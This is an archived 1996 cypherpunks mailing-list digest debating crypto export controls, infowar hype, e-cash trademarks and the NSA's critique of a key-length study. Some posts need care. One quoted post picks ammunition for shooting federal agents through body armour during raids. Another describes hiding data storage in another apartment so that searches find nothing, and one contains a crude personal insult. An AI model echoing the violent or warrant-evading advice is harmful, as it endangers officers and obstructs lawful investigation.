From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Barber <jeffb@issl.atl.hp.com>
Date: Fri, 19 Jul 1996 03:37:01 +0800
To: david@sternlight.com (David Sternlight)
Subject: Re: Gorelick testifies before Senate, unveils new executive order
In-Reply-To: <v03007605ae13b9a0cd37@[192.187.162.15]>
Message-ID: <199607181514.LAA16918@jafar.issl.atl.hp.com>
MIME-Version: 1.0
Content-Type: text/plain


David Sternlight writes:

> Here's the problem in a nutshell: Everyone who has looked at our systems,
> from Cliff Stoll on to blue ribbon scientific commissions, has come to the
> conclusion that our society is vulnerable to willful sabotage from abroad,
> ranging from information sabotage (hacking electronic financial
> transactions) to physical sabotage (hacking power grid control computers to
> cause widespread power failures leading to serious damage to people and
> things; hacking the phone companies' computers, etc.). Some cases have
> already been observed. The field has already got a name and lots of
> publications. It's called "information warfare" and the government is
> taking it VERY seriously.
> 
> Serious studies have shown that the kinds of protections to make the
> systems we depend on robust against determined and malicious attackers (say
> a terrorist government, or one bent on doing a lot of damage in retaliation
> for one of our policies they don't like), have costs beyond the capability
> of individual private sector actors.

> In such a case, where public benefits from government action greatly exceed
> public (taxpayer) costs, and the private sector cannot (or will not) act
> unaided, the classical basis for government action in the interests of the
> citizenry exists. It's the economist's "lighthouse" argument.
> 
> The motivation has nothing to do with privacy, government snooping, or any
> of the other things some get so excited about, though the solutions
> certainly have side effects in those domains. The goal should be to
> minimize the deleterious side-effects, not to throw out the baby with the
> bath water.

I for one reject your premise and your conclusions.  There is no 
indication that government is capable of addressing this "problem"
in a useful way.  In fact, I argue that the situation is at least
partially of government construction.  The government's hindrance of
crypto technology has undoubtedly slowed down and in many cases
entirely prevented the application of current technology to protect
the very systems the government now purports to be concerned about.

(This is not conjecture or speculation; it is fact.  I personally have
witnessed -- and, in some cases, been part of -- the many hundreds of
hours of productivity lost to producing and distributing security software
in ways that protect the company from ITAR violations, or trying to
formulate adequate solutions for the company's non-US customers.)

My message to a government concerned about the dangers of "information
warfare" (and its apologists): get out of the way and let industry work
on security.  Then you can choose from the products offered for your 
protection or develop your own.  But don't sit there and prevent or help
prevent deployment of security technology while decrying the lack of
security.

I don't claim that the current security deficiencies are entirely due
to ITAR restrictions but it is certainly a significant factor, and there
is still zero evidence that the government is competent to help.  Let
them first fix their own problems (e.g. the alleged 250,000 DoD computer
breakins), *then* come help us in the private sector.


-- Jeff




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Fri, 19 Jul 1996 04:55:06 +0800
To: cypherpunks@toad.com
Subject: Re: US versions of Netscape now available
Message-ID: <199607181521.LAA44436@osceola.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

[I've wanted, and tried (honest!) to stay out of this emerging
flamewar, but David Sternlight <david@sternlight.com> wrote:

<...>

>It doesn't "leak overseas" as if there were some regrettable lapse in the
>plumbing. Someone has to commit a felony violation of Federal law.

Also known as "civil disobedience," a dangerous concept which
is probably being taught today in civics classes in highschools
across the nation. [HORRORS!]

On a more serious note, I think that the requirements on the
Netscape download page might actually be a "Good Thing," since
they expose the public, in an election year, to the info-lust
of the GAK crowd in a way that cypherpunks alone never could.

I, too, wish that "my life as an arms trafficker," or the CJR
book/t-shirt requests, or some of the wilder stuff like Vince's
export-a-cryptosystem-to-Anguilla page were linked to Netscape's
page discussing ITAR requirements, but I fully understand that
Netscape is a business and that they must deal, on a continuing
basis, with the government. The government officials whose jobs
depend on stupid regs. can be rather humor-impaired.
JMR

Regards, Jim Ray -- DNRC Minister of Encryption Advocacy

"It is long past time to end the laughable presumption that voters
 who can easily cope with the choices offered at Burger King are
 somehow 'confused' by more than two choices at the voting booth."
 -- me

 Defeat the Duopoly! Vote "NOTA," not Slick/Dull in November.
 Harry Browne for President. Jo Jorgensen for Vice-president.
 http://www.HarryBrowne96.org/
___________________________________________________________________
PGP id.E9BD6D35 51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8
<mailto:liberty@gate.net> http://www.shopmiami.com/prs/jimray Coming
soon, the "Pennies For Perot" page. Keep billionaires off welfare!
___________________________________________________________________


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh.

iQCVAwUBMe5TwW1lp8bpvW01AQFbpgP/aic2ShJ5N09eVJLxZAUfkP1FsNlNRdFY
MNgLvE8+0PnlLoXA2Js5HVo7Zad7URYrtwrSG2C7MwPcs6zwXgxLT6pf+oCg05/m
fqaGbc/bWFLTyJDV/+BNEZCWRXPr19FvHv+0NNEVYbQ81IuQsLIgBf/E3g2KXD6X
Ma44rCMPTFU=
=JR+d
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 19 Jul 1996 06:42:12 +0800
To: cypherpunks@toad.com
Subject: Borders *are* transparent
Message-ID: <ae13cb6c140210047abf@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:51 AM 7/18/96, snow wrote:
>On Tue, 16 Jul 1996, David Sternlight wrote:
>> At 3:36 AM -0700 7/16/96, Duncan Frissell wrote:
>> >At 04:18 PM 7/15/96 -0700, sameer wrote:
>> >>    Not like that's tough to figure out. Congrats. It's cool to
>> >>actually be able to connect to my webserver using real encryption.
>> >>Glad the lawyers don't think Barksdale is going to jail anymore.
>> >I'm glad too.  So how many minutes did it take to leak overseas?
>> It doesn't "leak overseas" as if there were some regrettable lapse in the
>> plumbing. Someone has to commit a felony violation of Federal law.
>
>     No they don't. If they are French, Russian, English, Greek, etc. They
> _may_ be violating their countries laws, but they are not necessarily
>violating ours.

This is a terribly important point: if a citizen of Foobaria succeeds in
connecting to the Netscape site--perhaps by experimenting with various
combinations of domain names and submitted address/zipcode
combinations--and Netscape sends him the file, he has not committed a crime
in his own country. (Unless they have their own laws....)

Ironically, under the ITARs, as I understand them, a citizen of Foobaria
who "exports" (= retrieves from Netscape's site) such materials actually
*has* violated our ITARs. (It is possible for persons outside the U.S. to
violate U.S. laws, of course. You can all imagine examples.) Prosecuting a
person in Foobaria for violating U.S. ITAR regs would of course be
problematic, and unlikely.

Likewise, much "export-controlled" software is freely purchasable without
any form of identification or proof of citizenship/residency in any of
thousands of U.S. software stores. (I don't know if the copies of Netscape
Navigator on the shelves in U.S. stores are now the "U.S." version, as
opposed to be a somwhat-crippled version, but I sure do know that a *lot*
of nominally-export-controlled software _is_ freely purchasable.)

Much of this software goes out of the country in luggage. In my various
flights out of the U.S. over the years, never have my bags been so much as
glanced at, except presumably for bombs with sniffers, scanners, etc.
Further, I have mailed optical disks out of the country--a single one of
these can store a whole lot of stuff.

(As I said in a 1992 interview, a DAT is like a shoulder-fired Stinger missile.)

On a trip to France and Monaco last year, I deliberately carried several
optical cartridges and couple of DATs, all crammed with  software, PGP,
RSADSI's MailSafe, Mathematica, etc. To make a point, and as props for my
talk on crypto anarchy. Certainly there was no checking on the way out at
SFO, and no checking whatsoever at Charles de Gaulle in Paris.

(On my return trip, the bored inspector in San Francisco asked what my
purpose in being overseas has been. Had I said "tourism" I would've been
waved through. Instead, for interest, I said "Meeting with Russian
cryptographers in Monte Carlo," just to see what would happen. He asked me
what "cryptographers" are or do... "They make secret codes." He then waved
me through. Sigh.)

None of this is surprising, of course. Borders _are_ transparent. There are
so _many_ degrees of freedom for getting stuff across borders. The hope
that a bunch of *bits* can be stopped in ludicrous.

_This_ is why I expect the Netscape beta to arrive overseas pretty soon.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Sternlight <david@sternlight.com>
Date: Fri, 19 Jul 1996 09:59:21 +0800
To: Jeff Barber <jeffb@issl.atl.hp.com>
Subject: Re: Gorelick testifies before Senate, unveils new executive order
In-Reply-To: <v03007605ae13b9a0cd37@[192.187.162.15]>
Message-ID: <v03007608ae142fe9978b@[192.187.162.15]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:14 AM -0700 7/18/96, Jeff Barber wrote:
>David Sternlight writes:
>
>> Here's the problem in a nutshell: Everyone who has looked at our systems,
>> from Cliff Stoll on to blue ribbon scientific commissions, has come to the
>> conclusion that our society is vulnerable to willful sabotage from abroad,
>> ranging from information sabotage (hacking electronic financial
>> transactions) to physical sabotage (hacking power grid control computers to
>> cause widespread power failures leading to serious damage to people and
>> things; hacking the phone companies' computers, etc.). Some cases have
>> already been observed. The field has already got a name and lots of
>> publications. It's called "information warfare" and the government is
>> taking it VERY seriously.
>>
>> Serious studies have shown that the kinds of protections to make the
>> systems we depend on robust against determined and malicious attackers (say
>> a terrorist government, or one bent on doing a lot of damage in retaliation
>> for one of our policies they don't like), have costs beyond the capability
>> of individual private sector actors.
>
>> In such a case, where public benefits from government action greatly exceed
>> public (taxpayer) costs, and the private sector cannot (or will not) act
>> unaided, the classical basis for government action in the interests of the
>> citizenry exists. It's the economist's "lighthouse" argument.
>>
>> The motivation has nothing to do with privacy, government snooping, or any
>> of the other things some get so excited about, though the solutions
>> certainly have side effects in those domains. The goal should be to
>> minimize the deleterious side-effects, not to throw out the baby with the
>> bath water.
>
>I for one reject your premise and your conclusions.  There is no
>indication that government is capable of addressing this "problem"
>in a useful way.

Let's see what the study group recommends. There are a lot of things the
government can do, and plenty of historical precedent. To take one example,
in the merchant marine industry the government for years paid a subsidy for
shipbuilders to add certain "national defense features" to ships they were
building, to harden them in excess of normal civilian requirements so
they'd be robust in time of war. No shipbuilder could afford such features
unaided, and without them we either had a dramatically reduced shipping
capability in wartime or a very vulnerable one. Things have changed since
then, but the basic principles in the example are still valid.

> In fact, I argue that the situation is at least
>partially of government construction.  The government's hindrance of
>crypto technology has undoubtedly slowed down and in many cases
>entirely prevented the application of current technology to protect
>the very systems the government now purports to be concerned about.

There are no restrictions on using as good domestic crypto as you can get,
and this issue is about the robustness of our domestic information
infrastructure. Clearly if hardening were cost-justified to the civilian
companies it would have been done already.

One of the core problems is that the benefits from hardening cannot be
captured by the individual compnanies, so they cannot cost-justify doing
it. But the losses from failure to harden can cost the wider society much
treasure. That's a natural case for government intervention on behalf of
the wider society. It's exactly like the "lighthouse" argument. The
benefits from a lighthouse can't justify an individual shipbuilder building
one, but the losses to society from the random aggregation of shipwrecks
are far greater than the cost of lighthouses. Ergo, the government builds
the lighthouses.

>
>(This is not conjecture or speculation; it is fact.  I personally have
>witnessed -- and, in some cases, been part of -- the many hundreds of
>hours of productivity lost to producing and distributing security software
>in ways that protect the company from ITAR violations, or trying to
>formulate adequate solutions for the company's non-US customers.)

Irrelevant to the central issue we're discussing, and by comparison, a gnat.

>
>My message to a government concerned about the dangers of "information
>warfare" (and its apologists): get out of the way and let industry work
>on security.  Then you can choose from the products offered for your
>protection or develop your own.  But don't sit there and prevent or help
>prevent deployment of security technology while decrying the lack of
>security.

This isn't about preventing domestic deployment but assisting it. You are
raising an entirely unrelated issue--crypto export policy.

>
>I don't claim that the current security deficiencies are entirely due
>to ITAR restrictions but it is certainly a significant factor, and there
>is still zero evidence that the government is competent to help.  Let
>them first fix their own problems (e.g. the alleged 250,000 DoD computer
>breakins), *then* come help us in the private sector.

Again as irrelevant as the argument that we shouldn't jail criminals until
we've eliminated the economic inequities that allegedly produce crime.

David






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 19 Jul 1996 05:10:47 +0800
To: David Sternlight <david@sternlight.com>
Subject: Re: US versions of Netscape now available
In-Reply-To: <v03007605ae11ca8d04d9@[192.187.162.15]>
Message-ID: <199607181526.LAA01920@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



David Sternlight writes:
> >I'm glad too.  So how many minutes did it take to leak overseas?
> 
> It doesn't "leak overseas" as if there were some regrettable lapse in the
> plumbing. Someone has to commit a felony violation of Federal law.

Yes, just like its a crime to smoke grass, or have sex with someone
you aren't married to in half the states in the union. Of course, we
all know that the truth is that other than bluenose fools like David
Sternlight, most people in society have accepted that the government
is just plain stupid and happily go on doing what they would do
anyway.

David serves, however, as a useful reminder of the fact that there are
people out there who were so badly conditioned in childhood that they
are unable to disagree with authority no matter how badly they would
like to. I suspect that if a sufficiently highly placed government
official told David to strip naked and have sex with a dog in public
and phrased it as an order, he would do it, even though he would find
the act repugnant.

Luckily, after the revolution, the private sector will open centers to
help people like David get over their inability to function without
authority figures telling them what to do. Since the private sector
has high incentives not to waste money, unlike government sponsored
programs we can expect David and others like him to eventually become
useful members of society.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Sternlight <david@sternlight.com>
Date: Fri, 19 Jul 1996 08:14:08 +0800
To: perry@piermont.com
Subject: Re: US versions of Netscape now available
In-Reply-To: <v03007605ae11ca8d04d9@[192.187.162.15]>
Message-ID: <v03007609ae14327a31f4@[192.187.162.15]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:26 AM -0700 7/18/96, Perry E. Metzger wrote:
>David Sternlight writes:
>> >I'm glad too.  So how many minutes did it take to leak overseas?
>>
>> It doesn't "leak overseas" as if there were some regrettable lapse in the
>> plumbing. Someone has to commit a felony violation of Federal law.
>
>Yes, just like its a crime to smoke grass, or have sex with someone
>you aren't married to in half the states in the union. Of course, we
>all know that the truth is that other than bluenose fools like David
>Sternlight, most people in society have accepted that the government
>is just plain stupid and happily go on doing what they would do
>anyway.
>
>David serves, however, as a useful reminder of the fact that there are
>people out there who were so badly conditioned in childhood that they
>are unable to disagree with authority no matter how badly they would
>like to. I suspect that if a sufficiently highly placed government
>official told David to strip naked and have sex with a dog in public
>and phrased it as an order, he would do it, even though he would find
>the act repugnant.
>
>Luckily, after the revolution, the private sector will open centers to
>help people like David get over their inability to function without
>authority figures telling them what to do. Since the private sector
>has high incentives not to waste money, unlike government sponsored
>programs we can expect David and others like him to eventually become
>useful members of society.
>

Your contumely arises from your ignorance in that you are clearly
unfamiliar with my consistent position on the Digital Telephony Act and
many other issues.

Not everyone who disagrees with you on some issues is a fool or a knave,
and to say so suggests the need for a mirror.

David






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex de Joode <usura@replay.com>
Date: Thu, 18 Jul 1996 20:57:36 +0800
To: cypherpunks@toad.com
Subject: Re: #E-CASH: PRODUCT OR SERVICE?
Message-ID: <199607180929.LAA03315@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <m0ugN8o-000HEEC@JATO.hackvan.com> Stig wrote:

: > Date: Tue, 16 Jul 1996 22:48:23 +0200 (MET DST)
: >  From: Alex de Joode <usura@replay.com>
: >  To: cypherpunks@toad.com
: >  Subject: Re: #E-CASH: PRODUCT OR SERVICE?
: >  Newsgroups: list.cypherpunks
: > 
: > [..]
: >  : "Ecash" is a registered trademark of DigiCash.  It is registered
: >  : with the Benelux trademark office and the United States
: >  : trademark office.  I believe that it is considered unwise to use
: >  : minor variations on trademarked names, but I'm not an
: >  : intellectual property rights lawyer.
: >  
: >  The Benelux (Netherlands, Belgium and Luxembourg) trademark laws
: >  don't allow for slight variations, certainly not if there is a
: >  change that people get confused, it is very very likey that the
: >  judges of the benelux trademark court will decide that
: >  ecash and e-cash are just to simular, and will thus confuse the
: >  public. (art 5 lid 1 BMW)
: >  
: >  btw: I'm surprised DigiCash didn't file for a European Trademark,
: >  but opted for Benelux and US protection.

: Perhaps this has already been voiced on the main list (I get a filtered
: helping or two of cypherpunks), but *I'm* surprised that such a generic name
: as 'Ecash' was granted trademark status anywhere.

: It's like giving Microsoft a trademark on the term 'Email'...  It's nuts!
: Was the term ecash not in use before DigiCash showed up on the scene? 

Untill januari 1st 1996 you could trademark anything in The Benelux.
A bank (ABM*AMRO) has a trademark on 'the bank'; they essentially
upgraded a generic name into a trademark, but the recent changes made 
that impossible since the Benelux Trademark Buro has to check if a name 
is a generic name and they now have the power to refuse a registration. 

bEST Regards,
--

	-AJ-




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 19 Jul 1996 08:29:47 +0800
To: cypherpunks@toad.com
Subject: Re: New Infowarfare Panel
Message-ID: <ae13d2c21802100433db@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:14 PM 7/18/96, David Sternlight wrote:
>At 8:30 PM -0700 7/17/96, Timothy C. May wrote:
>
>>Winn Schwartau is running conferences, is talking about the imminent danger
>>of the nation's computer networks being knocked out (paraphrasing his
>>latest "Wired" item: "imagine your ATM network being knocked out and people
>>being unable to gain access to their money").
>>
>>Schwartau is predicting/advocating a "fifth branch" of the military to deal
>>with the this threat. A cyberforce, as it were.
>>
>>Color me skeptical, but I see this all as a lot of hype and fear-mongering.
>>Folks in the Pentagon, FBI, and NSA probably see it as a way to get more
>>funding, Folks in the consulting business probably see it as a way to crank
>>up the seminar prices and increase the number and frequency of "Information
>>Warfare" workshops and seminars.
>
>Haven't there been some worked examples of information warfare that make
>this fear and the need to deal with it legitimate?

I'm certainly not saying "information warfare" is impossible--for example,
I did some work in the late 70s for DARPA on knocking out satellites with
particle beam weapons. Specifically, I rebutted MIT Professor Kosta Tsipas'
claim that directed energy weapons in orbit would require tens (or more) of
Space Shuttle trips _per shot_. I showed the DARPA people how it could be
done with 5 orders of magnitude less energy, and speculated that
"ticklings" of satellites could be done with commercially available ion
implanters--they got real concerned and I was not invited to the classified
sessions where they discussed this threat model, as I lacked a clearance.

However, the current wave of publicity about "information warfare" seems to
focus on _possible_ scenarios, with Hollywoodesque overtones. (And I just
learned that "infowar consultant" Schwartau is indeed "working on a movie."
Not to ascribe impure motives to him--who's to say what's impure?--but it
still sounds like hype to me.)

>As I recall my background reading in the public press, wasn't the etiology
>that we figured out how to do some pretty nasty things (the Gulf war was
>one presenting occasion) to enemies' info infrastructures to threaten their
>entire social system. Then, as I understand it, someone smart said
>something like "If we can do this to them, then someone can do this to us."
>and we were off to the races.

Sure, we dropped conductive fibers on their power lines, we blew their
dishes out with Special Ops sniper fire, and we did a lot of other such
things.

Could this destroy the nation's "infrastructure"? Hey, there have been
scenarios for disrupting Wall Street, for all sorts of things. Bombs in
power plants, knocking over high tension lines, etc. Some things never
change. But destroying or even seriously damagaing the U.S. infrastructure
would be _very_ hard to do.

Sure, the government should think about such things. Utilities companies
routinely plan for efforts to disrupt service. (I live a mile or two from
where "Earth Action Now!" knocked over a power line about the time
treehugger activist Judi Bari was partly blown up while apparently
transporting a homemade bomb down here to Santa Cruz.)

>It's the military and counterintel community's job to think like this and
>act to protect us. I don't think imputing selfish motives is dispositive.

I noted that there is a recent wave of hype: books, conferences, calls for
action, even movie deals (:-}). Given that there is no real evidence that
these mysterious "HERF guns" have ever been used, nor is there evidence
that they would do much beyond knocking out the PCs in the office they were
aimed at, this is why I said "color me skeptical."

By the way, I was interviewed for the BBC programme "The I-Bomb," had
discussions a while back with someone working on HERF guns, and have been
in touch with Schwartau on this latest round (he contacted me). I'm still
skeptical. "Extraordinary claims require extraordinary proof."

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robin Powell <rpowell@algorithmics.com>
Date: Fri, 19 Jul 1996 04:42:17 +0800
To: Arun Mehta <cypherpunks@toad.com
Subject: Re: ANNOUNCEMENT: PGPfone Beta 7 Now Available for Download
In-Reply-To: <1.5.4.32.19960718150222.0030bf9c@giasdl01.vsnl.net.in>
Message-ID: <96Jul18.115805edt.20483@janus.algorithmics.com>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> In article <1.5.4.32.19960718150222.0030bf9c@giasdl01.vsnl.net.in>, Arun Mehta <amehta@giasdl01.vsnl.net.in> writes:

    > In response to my question about how I might use PGPfone without my ISP knowing,
    > At 10:52 16/07/96 -0400, Robin Powell wrote:
    >> 
    >> Hmm... This looks like a _really_ good place for stego.  Granted, you
    >> might get a significant slow down, but it might be worth it depending
    >> on your needs.

    > Wouldn't that be very, very slow? It would suffice if I could
    > have the ISP think that the packets were for irc, or something
    > else they allow...

I actually wasn't reffering to your particular situation so much as a
general comment.  Having a game of nettrek with encrypted voice in the
unused packets would be _very_ secure, I should think...

-Robin




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 19 Jul 1996 07:38:54 +0800
To: cypherpunks@toad.com
Subject: Re: Opiated file systems
Message-ID: <ae13d749190210044435@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:05 AM 7/18/96, jim bell wrote:

>It has long occurred to me, considering the size and low power of the
>typical 3.5" hard drive compared with the size of the typical house or
>apartment, that it might be an interesting project to remotely connect such
>a (hidden) drive to your computer using a reasonably surreptious link that
>is difficult to trace.  Say, an IR optical link, a single bare (unjacketed)
>optical fiber, a LAN with hidden nodes, or a similar system.  Maybe an
>inductive pickup.  In any raid, they'll have to decide what to take, and
>chances are very good that they won't find every hidden item.

I think the druggies call this a "rat line": two apartments next to each
other, with the humans living in one and the drugs stored in the other. The
drugs are gotten through a hole in the wall.

(Hey, I'm not saying it works, or that it stops raids, prosecutions,
convictions, etc. Just noting the existence.)

Any multi-unit apartment can do this already, with data. The hard disk can
be upstairs and two units away, connected with Ethernet (as many apartment
buildings out here in California already are), or whatever. Any raid on
Unit 3B, for example, finds that no files are stored locally. A separate
investigation and/or search warrant for whereever the files actually are
stored would be of course problematic and/or delayed.

(Friends of mine have worked on "remote storage" ideas for exactly such
applications. Clearly there are many options: storage in other local sites,
storage in offshore sites, encrypted storage, even storage by a "priest"
functionary ("Son, I am ready to receive your digitally transmitted
confession.").)

Lots of possibilities. For various reasons, few have been pursued. (Mostly
because, I think, there have been relatively few raids on data, and when
there have been raids, there were usually other HUMINT-type factors
involved. E.g., few child porn rings are going to be broken only on the
basis of seized disks. As this situation changes, expect more "data
archival" services to evolve.)

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Fri, 19 Jul 1996 04:51:39 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Responding to Pre-dawn Unannounced Ninja Raids
In-Reply-To: <ae1308450f021004a134@[205.199.118.202]>
Message-ID: <199607181704.MAA16235@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Timothy C. May wrote:
> As people as diverse as Marine Colonel Jeff Cooper and Watergate felon G.
> Gordon Liddy have noted, any black-clad "ninjas" entering a home at 4 a.m.
> without clearly announcing themselves are asking for trouble. (Liddy got in
> a lot of trouble for calling for "head shots" on rampaging BATFags.
> Frankly, I'm not a good enough shot--especially in high-stress
> situations--to make head shots with my H & K .45, so I can only hope to
> make torso shots.)
> 
> It's a mark of what has gone wrong with this country that ordinary citizens
> actually fear the midnight raids, the no-knock searches, the "threat
> suppression" by ninjas.
> 
> Personally, I think all folks should be armed at all times in their homes.
> Those who aren't are taking their chances. My personal choice is a Heckler
> & Koch USP .45. loaded with Federal Golden Sabres, a hollowpoint round that
> has a 92% one-shot stop rate, with adequate penetration through Kevlar
> vests (typically worn by BATF raiders). I may die, but I hope I can take at
> least two of them with me. (Interestingly, the same class of folks who want
> to ban "military-grade crypto" are also seeking to ban Kevlar vest-piercing
> rounds. Fortunately, though KTW ammo is no longer available to "marks" (=
> civilians), .45 ACP +P does a pretty good job. Certain +P .357 Magnum
> rounds are even better penetrators, but recoil and muzzle blast is pretty
> severe with these loads.)

Then I also suggest that you install a metal door and put metal cages on
your windows.  That will at least give you some time to wake up if
someone tries to break into your house. Also get a good dog.

Without that, having a gun will not do you much good. It will be more
trouble than itis worth because you cannot understand the situation
quickly enough after you wake up, so you may kill someone peaceful who
entered your home with good intentions, which will get you in jail.  If
you had a metal door, you would have enough time to wake up and assess
the situation.

One-sided approaches to security rarely are successful.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@research.att.com>
Date: Fri, 19 Jul 1996 04:36:30 +0800
To: cypherpunks@toad.com
Subject: NSA response to key length report
Message-ID: <199607181604.MAA12956@nsa.research.att.com>
MIME-Version: 1.0
Content-Type: text/plain



July 18, 1996

There is currently being circulated, to members of Congress and
possibly elsewhere, a four page document entitled ``Brute-Force
Cryptanalytic Attacks'' that calls into question some of the
conclusions of the ``Minimum Key Lengths for Symmetric Ciphers'' white
paper [1].  The document bears no author or organization attribution,
but we are told that it originated from NSA.

The NSA document argues that ``physical realities'' make parallel key
search much more expensive and time consuming than our white paper
estimated.  However, the NSA document appears to have been written
from the perspective of general parallel processing or cryptanalysis
rather than exhaustive key search per se.  It ignores several
elementary principles of parallel processing that apply specifically
to exhaustive key search machines of the type that our white paper
considered.

In particular, NSA argues that interconnections, heat dissipation,
input/output bandwidth, and interprocessor communication make it
difficult to ``scale up'' a key search machine by dividing the task
among a large number of small components.  While these factors do
limit the scalability of more general purpose multiprocessor computers
(such as those made by Cray), they do not apply at all to specialized
exhaustive key search machines.  The NSA argument ignores the most
fundamental feature of brute-force key search: the processors
performing the search have no need to communicate with other
components of the system while they perform their share of the search,
and therefore the system has no need for any of the global
interconnections that limit scaling.  Indeed, there is no reason that
all the components of a parallel search machine must be located even
within the same city, let alone the same computer housing.  We note
that one of our co-authors (Eric Thompson, of Access Data, Inc.)
designs and builds medium-scale FPGA-based key search machines with
exactly this loosely-coupled structure, and regularly uses them to
recover keys for clients that include the FBI.

The NSA document also calls into question our cost estimates for ASIC
components, suggesting that ASIC chips of this type cost NSA
approximately $1000.00 each.  However, our $10.00 per chip estimate is
based on an actual price quote from a commercial chip fabrication
vendor for a moderate-size order for an exhaustive search ASIC
designed in 1993 by Michael Wiener [2].  Perhaps NSA could reduce its
own costs by changing vendors.

Finally, the NSA report offers estimates of the time required to
perform exhaustive search using a Cray model T3D supercomputer.  This
is a curious choice, for as our report notes, general-purpose
supercomputers of this type make poor (and uneconomical) key search
engines.  However, even the artificially low performance results for
this machine should give little comfort to the users of 56 bit keys.
According to NSA, 56 bit keys can be searched on such a machine in
less than 453 days.  ``Moore's law'' predicts that it will not be long
before relatively inexpensive general-purpose computers offer similar
computational capability.

/s/  Matt Blaze
     Whitfield Diffie

References:

[1] Blaze, M., Diffie, W., Rivest, R., Schneier, B., Shimomura, T.,
    Thompson, E., and Wiener, M.  ``Minimum Key Lengths for Symmetric
    Key Ciphers for Commercial Security.''  January 1996.  Available
    from ftp://ftp.research.att.com/dist/mab/keylength.txt

[2] Wiener, M.  ``Exhaustive DES Key Search.''  Presented at
    Crypto-93, Santa Barbara, CA.  August 1993.

=========================================================================
[Transcription of document circulated to various members of congress
and others in June, 1996, apparently by NSA]

BRUTE-FORCE CRYPTANALYTIC ATTACKS

Two published theoretical estimates of cost versus time to perform
brute-force hardware attacks on selected cryptography key lengths
differ between themselves and differ significantly from what we find
when we buy or build computers to carry out such attacks.

The differences lie in assumptions made in the theoretical estimates,
which are not fully spelled out by the authors, and in scaling up
hypothesized small machines to ever larger ones without accounting for
physical realities.

The factors not accounted for are:

  o R&D costs for the first machine, typically on the order of $10
    million.

  o As more and more chips are added to a machine, two effects occur:

      o Interconnections increase and increase running time;
      o Heat from the chips eventually limit [sic] the size of a
        machine.

  o Memory costs are not included.

  o When get [sic] to the very fast processing speed estimates,
    machines can become Input/Output bound; so [sic] it cannot achieve
    the estimated speed.

  o Assuming every algorithm can be tested in same amount of time and
    key length is the only difference.

Table 1 are [sic] the average time estimates made for a given cost
done by Michael Wiener of Bell Norther Research in 1995.  These are
published in Bruce Schneier's Applied Cryptography book.

Note that these are average times, one-half of the total exhaust time.

Table 2 are [sic] the estimates for total exhaust times using Field
Programmmable Gate Arrays (FPGA) and Application Specific ICs (ASICs)
done for the Business Software Alliance by Blaze, Diffie, Rivest,
Schneier, Shimomura, Thompson, and Wiener in 1996.  In addition to the
above factors not accounted for they have assumed ASICs cost as low as
$10.  We find ASICs more typically cost $1000 and their capabilities
can vary considerably depending upon the specific task.

Table 3 are out estimates based on our experience with a Cray T3D
supercomputer with 1024 nodes.  This machine costs $30 million.

[Tables 1, 2, and 3 not transcribed here.]





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 19 Jul 1996 04:29:27 +0800
To: Jüri Kaljundi <jk@stallion.ee>
Subject: Re: Cybank breaks new ground; rejects public-key encryption
In-Reply-To: <Pine.GSO.3.93.960718180020.10966B-100000@nebula.online.ee>
